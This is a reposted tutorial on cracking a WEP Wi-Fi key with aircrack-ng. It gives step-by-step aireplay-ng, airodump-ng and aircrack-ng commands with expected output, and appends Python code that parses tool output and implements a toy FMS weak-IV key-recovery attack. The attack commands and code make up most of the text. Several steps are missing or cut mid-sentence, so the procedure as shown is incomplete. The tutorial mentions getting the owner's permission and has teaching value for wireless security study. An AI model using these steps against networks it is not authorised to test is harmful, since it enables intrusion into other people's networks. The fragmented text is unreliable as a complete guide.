hacking wep with aircrack

Upload: edscott66

Post on 02-Jun-2018

8/10/2019 Hacking WEP With Aircrack

Hacking WEP with Aircrack

This tutorial walks you through a very simple case to crack a WEP key. It is intended to build your basic skills and get you familiar with the concepts. It assumes you have a working wireless card with drivers already patched for injection.

It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.

I would like to acknowledge and thank the Aircrack-ng team for producing such a great, robust tool.

Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome.

Assumptions

First, this solution assumes:

You are using drivers patched for injection.

You are physically close enough to send and receive access point packets. Remember that just because you can receive packets from the access point does not mean you will be able to transmit packets to the AP. The wireless card's transmit power is typically less than the AP's, so you have to be physically close enough for your transmitted packets to reach and be received by the AP.

There is at least one wired or wireless client connected to the network and it is active. The reason is that this tutorial depends on receiving at least one ARP request packet, and if there are no active clients then there will never be any ARP request packets.

You are using v0.9 of aircrack-ng. If you use a different version then some of the common options may have to be changed.

Ensure all of the above assumptions are true, otherwise the advice that follows will not work.

In the examples below, you will need to change "ath0" to the interface name which is specific to your wireless card.

Equipment used

In this tutorial, here is what was used:

MAC address of PC running aircrack-ng suite: 00:0F:B5:88:AC:82

BSSID (MAC address of access point): 00:14:6C:7E:40:80

ESSID (Wireless network name): teddy

Access point channel: 9

Wireless interface: ath0

(Aircrack-ng team: http://trac.aircrack-ng.org/wiki/Team)

You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network.

Solution

Solution Overview

To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs).


wifi0     no wireless extensions.

If there are any remaining athX interfaces, then stop each one. When you are finished, run "iwconfig" to ensure there are none left.

... frequency, which is channel 9, and the Access Point field shows the MAC address of your wireless card. Please note that only the madwifi-ng drivers show the MAC address of your wireless card; the other drivers do not do this. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.

To match the frequency to the channel, check out http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels and then select the "Wifi Channel Selection and Channel Overlap" tab. This will give you the frequency for each channel.

Step 2 - Test Wireless Device Packet Injection


The purpose of this step is to ensure that your card is within range of your AP and can inject packets to it.

Enter:

aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0

Where:

-9 means injection test

-e teddy is the wireless network name

-a 00:14:6C:7E:40:80 is the access point MAC address

ath0 is the wireless interface name

The system should respond with:

09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35  Trying broadcast probe requests...
09:23:35  Injection is working!
09:23:37  Found 1 AP
09:23:37  Trying directed probe requests...
09:23:37  00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39  30/30: 100%

The last line is important. Ideally it should say 100% or a very high percentage. If it is low then you are too far away from the AP or too close. If it is zero then injection is not working and you need to patch your drivers or use different drivers.

Step 3 - Start airodump-ng to capture the IVs

The purpose of this step is to capture the IVs generated. This step starts airodump-ng to capture the IVs from the specific access point.

Open another console session to capture the generated IVs. Then enter:

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0

Where:

-c 9 is the channel for the wireless network

--bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.

-w output is the file name prefix for the files which will contain the IVs.

ath0 is the interface name.

While the injection is taking place (later), the screen will look similar to this:

 CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy

 BSSID              STATION            PWR  Lost  Packets  Probes

 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782

Step 4 - Use aireplay-ng to do a fake authentication with the access point

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a "DeAuthentication" packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.

The lack of association with the access point is the single biggest reason why injection fails. Remember the golden rule: the MAC you use for injection must be associated with the AP, either by using fake authentication or by using a MAC from an already-associated client.

To associate with an access point, use fake authentication:

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Where:

-1 means fake authentication

0 is the reassociation timing in seconds

-e teddy is the wireless network name

-a 00:14:6C:7E:40:80 is the access point MAC address

-h 00:0F:B5:88:AC:82 is our card's MAC address

ath0 is the wireless interface name

Success looks like:

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)

Or another variation for picky access points:

aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Where:

6000 - Reauthenticate every 6000 seconds. The long period also causes keep-alive packets to be sent.

-o 1 - Send only one set of packets at a time. The default is multiple, and this confuses some APs.

-q 10 - Send keep-alive packets every 10 seconds.

Success looks like:

18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
... and so on.

Here is an example of what a failed authentication looks like:

18:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request

However, "decent" depends on a large variety of factors. A typical range is 300 to 400 data packets per second. It can be as low as 100/second and as high as 500/second.

Troubleshooting Tips

If you receive a message similar to "Got a deauth/disassoc packet. Is the source mac associated?", this means you have lost association with the AP. All your injected packets will be ignored. You must return to the fake authentication step (Step 4) and successfully associate with the AP.
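The rules given in prose for reading the injection test (Step 2), the "#/s" column of airodump-ng (Step 3) and a lost association (Step 4 and the tip above) are easy to misread by eye in a busy console. What follows is an added example, not part of this tutorial and not aircrack-ng code: it parses those outputs and applies the rules stated above. The sample outputs are constructed from the listings in this tutorial; the function names, the 90% threshold for a "good" injection test and the verdict strings are this example's own choices.

```python
import re

# Constructed sample outputs, modelled on the listings in the tutorial above.
INJECTION_TEST = """\
09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35  Trying broadcast probe requests...
09:23:35  Injection is working!
09:23:37  Found 1 AP
09:23:37  Trying directed probe requests...
09:23:37  00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39  30/30: 100%
"""

FAKE_AUTH_LOST = """\
18:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
"""

AIRODUMP_SCREEN = """\
 CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy

 BSSID              STATION            PWR  Lost  Packets  Probes

 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782
"""

_RATIO = re.compile(r"(\d+)/(\d+):\s*(\d+)%")          # the "30/30: 100%" line
_DEAUTH = re.compile(r"Got a deauth", re.IGNORECASE)   # "...deauthentication packet!" and "...deauth/disassoc packet."
_MAC = r"[0-9A-F]{2}(?::[0-9A-F]{2}){5}"
# AP row: BSSID PWR RXQ Beacons #Data #/s CH ...; the station row does not match
# because its second column is a MAC, not a number.
_AP_ROW = re.compile(r"^\s*(" + _MAC + r")\s+(-?\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s",
                     re.IGNORECASE | re.MULTILINE)


def injection_result(output):
    """(received, sent, percent) from the last 'n/m: p%' line of aireplay-ng -9, or None."""
    hits = _RATIO.findall(output)
    return tuple(int(x) for x in hits[-1]) if hits else None


def injection_verdict(output, good=90):
    """The tutorial's reading of the injection test: zero = driver problem, low = distance."""
    result = injection_result(output)
    if result is None or result[2] == 0:
        return "not working: patch or change the driver"
    if result[2] < good:
        return "weak: too far from (or too close to) the AP"
    return "ok"


def lost_association(output):
    """True if aireplay-ng reported a deauth: go back to fake authentication (Step 4)."""
    return _DEAUTH.search(output) is not None


def data_rate(screen, bssid):
    """(#Data, #/s) for `bssid` from an airodump-ng screen, or None if the AP is absent."""
    for m in _AP_ROW.finditer(screen):
        if m.group(1).upper() == bssid.upper():
            return int(m.group(5)), int(m.group(6))
    return None


def rate_verdict(per_second):
    """Compare #/s with the tutorial's typical 300-400 (observed 100-500) range."""
    if per_second == 0:
        return "no IVs: check association and the replay"
    if per_second < 100:
        return "slow"
    if per_second > 500:
        return "unusually fast"
    return "normal"


if __name__ == "__main__":
    print("injection:", injection_result(INJECTION_TEST), injection_verdict(INJECTION_TEST))
    print("lost association:", lost_association(FAKE_AUTH_LOST))
    data, rate = data_rate(AIRODUMP_SCREEN, "00:14:6C:7E:40:80")
    print("#Data", data, "#/s", rate, rate_verdict(rate))
```

In practice you would feed these functions the live output of the aireplay-ng and airodump-ng sessions (for example through `subprocess` pipes or a log file) and stop the replay as soon as `lost_association` fires, since every packet injected after a deauth is wasted.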

Step 6 - Run aircrack-ng to obtain the WEP key

The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps.


Start another console session and enter:

aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap

Where:

-z invokes the PTW WEP-cracking method.

-b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional, since when we originally captured the data we applied a filter to only capture data for this one AP.

output*.cap selects all files starting with "output" and ending in ".cap".

To also use the FMS/KoreK method, start another console session and enter:

aircrack-ng -b 00:14:6C:7E:40:80 output*.cap

Where:

-b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional, since when we originally captured the data we applied a filter to only capture data for this one AP.

output*.cap selects all files starting with "output" and ending in ".cap".

If you are using 1.0-rc1, add the option "-K" for the FMS/KoreK attack. (1.0-rc1 defaults to PTW.)

You can run this while generating packets. In a short time, the WEP key will be calculated and presented. You will need approximately 250,000 IVs for 64-bit and 1,500,000 IVs for 128-bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128-bit. These are very approximate, and there are many variables as to how many IVs you actually need to crack the WEP key.

Here is what success looks like:

                                 Aircrack-ng 0.9

                 [00:03:06] Tested 674449 keys (got 96630 IVs)

   KB    depth   byte(vote)
    0    0/  1   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0)
    1    0/  1   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)
    2    0/  1   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)
    3    0/  1   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15)

                         KEY FOUND! [ 12:34:56:78:90 ]
      Probability: 100%
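To show what the IV counts and the "byte(vote)" table above are measuring, here is an added example that is not part of this tutorial and not aircrack-ng's code: a toy WEP implementation (RC4 keyed with IV || root key, CRC-32 ICV) and the FMS weak-IV attack that the FMS/KoreK mode is built on. Everything in it is constructed: the 40-bit key 12:34:56:78:90, the ARP request that is re-encrypted under every IV (which is what an ARP replay makes the AP do), and the capture, which is restricted to the FMS weak IV class (B, 0xFF, X) so that 1,280 frames suffice. In a real capture only a small fraction of IVs fall in a weak class, and each weak IV votes for the right key byte only about 5% of the time, which is why the FMS/KoreK attack needs hundreds of thousands of IVs; PTW is a different statistical attack and is not shown here. The depth-first search over the top-voted candidates with an ICV check is this example's own simplification of the "depth" idea in the aircrack-ng output, not its algorithm.

```python
import zlib

ROOT_KEY = bytes([0x12, 0x34, 0x56, 0x78, 0x90])   # constructed 40-bit WEP key
SNAP_FIRST = 0xAA    # first LLC/SNAP byte of every 802.11 data frame: known plaintext
# Constructed ARP request (LLC/SNAP + ARP header + zeroed addresses). An ARP
# replay makes the AP re-encrypt this same plaintext under a fresh IV each time.
ARP_REQUEST = bytes.fromhex("aaaa030000000806" "0001080006040001") + bytes(20)


def rc4_ksa(key):
    """RC4 key scheduling over `key` = iv || root key (repeated to 256 steps)."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key, n):
    """First n bytes of RC4 output for `key`."""
    S, i, j, out = rc4_ksa(key), 0, 0, bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(root_key, iv, plaintext):
    """WEP body: iv || RC4(iv || root_key) XOR (plaintext || CRC-32 ICV)."""
    data = plaintext + zlib.crc32(plaintext).to_bytes(4, "little")
    ks = rc4_keystream(bytes(iv) + root_key, len(data))
    return bytes(iv) + bytes(a ^ b for a, b in zip(data, ks))


def wep_decrypt(root_key, frame):
    """Plaintext of `frame` under `root_key`, or None if the ICV does not check out."""
    iv, body = frame[:3], frame[3:]
    ks = rc4_keystream(iv + root_key, len(body))
    data = bytes(a ^ b for a, b in zip(body, ks))
    pt, icv = data[:-4], data[-4:]
    return pt if zlib.crc32(pt).to_bytes(4, "little") == icv else None


def fms_votes(frames, B, known):
    """FMS votes for per-packet key byte B (B >= 3), given bytes 3..B-1 in `known`.

    Runs the first B steps of the KSA with the public IV and the already
    recovered key bytes. On a "resolved" IV the first keystream byte z,
    known from the 0xAA SNAP byte, equals K[B] + j + S[B] in S-index terms
    with probability ~5%; every other resolved IV casts a random vote.
    """
    votes = [0] * 256
    for frame in frames:
        key = list(frame[:3]) + list(known)        # bytes 0..B-1 of iv || root key
        S, j = list(range(256)), 0
        for i in range(B):
            j = (j + S[i] + key[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
        if S[1] >= B or (S[1] + S[S[1]]) & 0xFF != B:
            continue                               # IV is not weak for this byte
        z = frame[3] ^ SNAP_FIRST                  # first keystream byte
        votes[(S.index(z) - j - S[B]) & 0xFF] += 1
    return votes


def recover_key(frames, key_len=5, depth=5):
    """Depth-first search over the top `depth` vote-getters per key byte; a full
    candidate is accepted only if it decrypts a captured frame to a valid ICV."""
    def search(known):
        if len(known) == key_len:
            cand = bytes(known)
            return cand if wep_decrypt(cand, frames[0]) is not None else None
        votes = fms_votes(frames, 3 + len(known), known)
        for b in sorted(range(256), key=lambda v: -votes[v])[:depth]:
            found = search(known + [b])
            if found is not None:
                return found
        return None
    return search([])


def weak_iv_capture(root_key, plaintext, key_len=5):
    """Constructed capture: only FMS weak IVs (B, 0xFF, X), 256 per key byte."""
    return [wep_encrypt(root_key, (B, 0xFF, X), plaintext)
            for B in range(3, 3 + key_len) for X in range(256)]


FRAMES = weak_iv_capture(ROOT_KEY, ARP_REQUEST)

if __name__ == "__main__":
    print("frames:", len(FRAMES), " resolved for byte 3:", sum(fms_votes(FRAMES, 3, [])))
    print("KEY FOUND! [", recover_key(FRAMES).hex(":"), "]")
```

Of the 256 IVs (3, 0xFF, X) only 254 resolve for the first key byte (X = 251 and 252 disturb S[0] or S[1] in the third KSA step), and of those only about one in twenty votes correctly; the attack works because the wrong votes are spread thinly over the other 255 values. That ratio, not the key size, is what sets the IV counts quoted in the paragraph above.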
